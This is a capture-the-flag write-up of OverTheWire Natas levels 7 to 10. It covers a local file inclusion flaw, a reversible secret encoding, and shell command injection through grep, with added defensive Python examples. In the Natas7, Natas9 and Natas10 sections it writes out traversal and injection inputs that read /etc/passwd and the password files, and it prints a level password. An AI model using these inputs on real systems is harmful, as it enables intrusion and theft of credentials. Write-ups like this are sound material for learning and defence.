Natas7-10

nurfitri

NATAS7

  • here we see a blank page with a navigation link.
  • inspecting the source code, we notice that the site resolves the page via the page query parameter: index.php?page
  • inputting index.php?page=home yields the home page.
  • but let's try inputting something that doesn't exist, such as index.php?page=l33t
  • we get a warning that looks like this.
[screenshot: warnings]
  • here the warning explains that the PHP code is trying to include() whatever we put in the query.
  • it doesn't even sanitise the input.
  • this can lead to a file traversal (local file inclusion) attack, where we use the include() call to navigate around the filesystem.
  • note that we might not be able to view files that the web server's user has no permission to read.
  • here we can manipulate the query parameter like this: index.php?page=../
  • this results in the page trying to include /var/www/natas
  • which may be the directory one level above the current page's directory.
  • we can try to traverse to the /etc/passwd file and we get its content.
root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 
sys:x:3:3:sys:/dev:/usr/sbin/nologin 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/usr/sbin/nologin 
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  • we can navigate to other paths if we want, say /etc/mysql/my.cnf
  • but now let's navigate to /etc/natas_webpass/natas8
  • here we find our password.
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
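
A hardened version of that include, as an added example in Python (not the challenge's PHP and not code from the Natas project): the page name is matched against an allowlist, and as a second layer the resolved path is checked to stay under the pages directory, so ../ and absolute paths such as the ones used above are rejected. The directory path and page names are assumptions made up for the example.

```python
import os
from typing import Optional

# Assumed layout, constructed for this example: includable pages live in one
# directory, and only these names are ever accepted from the ?page= parameter.
PAGE_DIR = "/var/www/natas/natas7/pages"
ALLOWED_PAGES = {"home", "about"}


def is_confined(user_value: str, page_dir: str = PAGE_DIR) -> bool:
    """Defence in depth: would joining user_value onto page_dir stay inside it?

    normpath() collapses '..' segments, and join() discards page_dir when
    user_value is absolute, so '../' and '/etc/natas_webpass/natas8' both
    end up outside the directory. (normpath does not follow symlinks; on a
    live system use os.path.realpath, which requires the path to exist.)
    """
    candidate = os.path.normpath(os.path.join(page_dir, user_value))
    return candidate.startswith(page_dir.rstrip(os.sep) + os.sep)


def resolve_page(page: str, page_dir: str = PAGE_DIR) -> Optional[str]:
    """Map ?page= to a file to include, or None if the request is unsafe.

    The allowlist is the real fix: the value is compared for exact equality
    and never interpreted as a path. The containment check is a backstop in
    case the allowlist is ever loosened to accept user-controlled names.
    """
    if page not in ALLOWED_PAGES:
        return None
    filename = page + ".php"
    if not is_confined(filename, page_dir):
        return None
    return os.path.join(page_dir, filename)
```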

NATAS8

  • here we see another input field that checks for a secret.
  • inspecting the code, we see the secret, but encoded.
  • analysing the code, we find that the secret is encoded via this process:
    • base64_encode() -> strrev() -> bin2hex()
  • all we have to do to decode it is reverse the encoding process:
    • hex2bin() -> strrev() -> base64_decode()
  • there are multiple ways to do this: online tools, PHP functions, or just your Linux OS.
  • in Linux, we can manipulate hex values using the xxd command.
  • to manipulate base64 strings we can use the built-in base64 command.
  • to reverse a string we can use the rev command.

xxd

  • to turn a string into hex we can use it like this
echo "ourString" | xxd -p
  • the -p option simply prints plain hex, without offsets or the ASCII column.
  • to reverse the process we use -r.
  • let's try it on our encoded secret.
echo 3d3d516343746d4d6d6c315669563362 | xxd -r -p
  • we get this, which looks like base64 but in reverse.
==QcCtmMml1ViV3b

rev

  • reversing a string is simple, just run
echo "hello" | rev

and it will produce

olleh
  • let's try it on our previous output.
echo ==QcCtmMml1ViV3b | rev

now we have the correct base64 format

b3ViV1lmMmtCcQ==

base64

  • to create a base64 string simply run
echo "hello" | base64

and we will get

aGVsbG8K
  • (the trailing K encodes the newline that echo appends; use printf instead of echo when the exact bytes matter.)
  • to decode it we use the -d flag.
  • let's try it on our previous output.
echo b3ViV1lmMmtCcQ== | base64 -d

we will get

oubWYf2kBq
  • alternatively we can combine all of the commands in one line by piping each output into the next.
echo 3d3d516343746d4d6d6c315669563362 | xxd -r -p | rev | base64 -d
  • let's try this in the input field.
  • and we get the password.
Access granted. The password for natas9 is XXXXXXXXXXXXXXXXXXXXXXXXXX
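
The same chain in Python, as an added example that is not the level's PHP or part of the original writeup: decode_steps() returns every intermediate value so it can be checked against the xxd -r -p, rev and base64 -d outputs above, and encode_secret() is the forward chain, which shows why a reversible encoding in readable source is obfuscation rather than protection.

```python
import base64
from typing import List


def encode_secret(secret: str) -> str:
    """Forward chain used by the level: base64_encode() -> strrev() -> bin2hex()."""
    b64 = base64.b64encode(secret.encode()).decode()  # base64_encode()
    reversed_b64 = b64[::-1]                          # strrev()
    return reversed_b64.encode().hex()                # bin2hex()


def decode_steps(encoded_hex: str) -> List[str]:
    """Inverse chain, one element per step: hex2bin() -> strrev() -> base64_decode().

    Returns [reversed base64, base64, plaintext], matching the output of
    'xxd -r -p', then 'rev', then 'base64 -d' in the writeup.
    """
    reversed_b64 = bytes.fromhex(encoded_hex).decode()  # hex2bin()        / xxd -r -p
    b64 = reversed_b64[::-1]                            # strrev()         / rev
    secret = base64.b64decode(b64).decode()             # base64_decode()  / base64 -d
    return [reversed_b64, b64, secret]


def decode_secret(encoded_hex: str) -> str:
    """Only the final plaintext."""
    return decode_steps(encoded_hex)[-1]


def round_trips(encoded_hex: str) -> bool:
    """True when decoding and re-encoding reproduces the hex exactly."""
    return encode_secret(decode_secret(encoded_hex)) == encoded_hex


# The encoded secret quoted on the page, used as the worked input.
ENCODED_SECRET = "3d3d516343746d4d6d6c315669563362"
```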

NATAS9

  • here we see another input that takes our input as a search keyword.
  • further inspecting the source, we see that it uses passthru() on our input.
  • reading the docs, passthru() lets the script run an OS command and return its raw output.
  • we notice that the passthru() call in this code uses grep to search for text.
<?
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];   // user input, taken as-is
}
if($key != "") {
    // $key is interpolated straight into the shell command line
    passthru("grep -i $key dictionary.txt");
}
?>
  • we know that with the grep command we can read the content of a file.
  • the webpage does not sanitise our input, so we are able to break out of the intended command and perform a command injection attack.
  • we can craft our input so that it executes something like this
//our input is:  root /etc/passwd #
passthru("grep -i root /etc/passwd # dictionary.txt")
  • because the code simply appends our input directly into the command string,
  • we are able to inject our own arguments by making use of how the Linux shell parses a command line (here the # turns the rest of the line, dictionary.txt, into a comment).
  • doing the above example we get this output.
root:x:0:0:root:/root:/bin/bash
  • let us now view the content of /etc/natas_webpass/natas10
//our input is: '' /etc/natas_webpass/natas10 #
passthru("grep -i '' /etc/natas_webpass/natas10 # dictionary.txt")
  • then we get the password

  • alternatively we can break the command like this

//our input is: '' test.txt & cat /etc/natas_webpass/natas10 #
passthru("grep -i '' test.txt & cat /etc/natas_webpass/natas10 # dictionary.txt")
//or
//our input is: '' . ; cat /etc/natas_webpass/natas10 #
passthru("grep -i '' . ; cat /etc/natas_webpass/natas10 # dictionary.txt")
  • there are multiple ways to do it.

NATAS10

  • this level is the same as level 9, but our input gets filtered by a regex.
  • let us inspect the regex
/[;|&]/
  • what it does is check for any character inside the list denoted by the []
  • based on it we know that it checks for the ; , | and & characters, and nothing else.
  • our previous exploit doesn't actually use any of these characters.
  • so we can simply run the same exploit again but change the file to natas11
  • then we get the password
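
To see why the natas10 blocklist does not stop the natas9 input, here is an added Python example (not the challenge's code) covering both levels: shell_argv() shows how the shell tokenises the page's interpolated grep line, blocklist_rejects() is the /[;|&]/ check, and quoted_command()/safe_argv()/allowlist_ok() are the fixes, quoting the needle the way PHP's escapeshellarg() does, passing it as a single argv element, or validating it positively. dictionary.txt is the file name from the page; nothing here actually runs grep.

```python
import re
import shlex
from typing import List

BLOCKLIST = re.compile(r"[;|&]")   # the natas10 filter quoted on the page


def blocklist_rejects(needle: str) -> bool:
    """natas10's check: reject only when ; | or & occurs somewhere in the needle."""
    return BLOCKLIST.search(needle) is not None


def shell_argv(needle: str) -> List[str]:
    """Argument vector the shell builds from passthru("grep -i $key dictionary.txt").

    The needle is pasted into the command string first and split by the shell
    afterwards, so spaces add arguments and '#' comments out everything after
    it, including dictionary.txt. (shlex approximates POSIX word splitting; it
    does not interpret operators such as ; | &, so only feed it inputs without them.)
    """
    return shlex.split(f"grep -i {needle} dictionary.txt", comments=True)


def quoted_command(needle: str) -> str:
    """Fix 1: quote the needle before interpolating (PHP: escapeshellarg($key))."""
    return f"grep -i {shlex.quote(needle)} dictionary.txt"


def quoted_argv(needle: str) -> List[str]:
    """What the shell sees for the quoted command: the needle stays one word."""
    return shlex.split(quoted_command(needle), comments=True)


def safe_argv(needle: str) -> List[str]:
    """Fix 2 (preferred): no shell at all. argv is built directly so the needle
    is exactly one argument; '-e' keeps a needle starting with '-' from being
    read as a grep option."""
    return ["grep", "-i", "-e", needle, "dictionary.txt"]


def allowlist_ok(needle: str) -> bool:
    """Fix 3: positive validation for a dictionary search, letters only, bounded."""
    return re.fullmatch(r"[A-Za-z]{1,64}", needle) is not None
```

In Python the preferred form would be run as subprocess.run(safe_argv(needle), capture_output=True), with no shell involved.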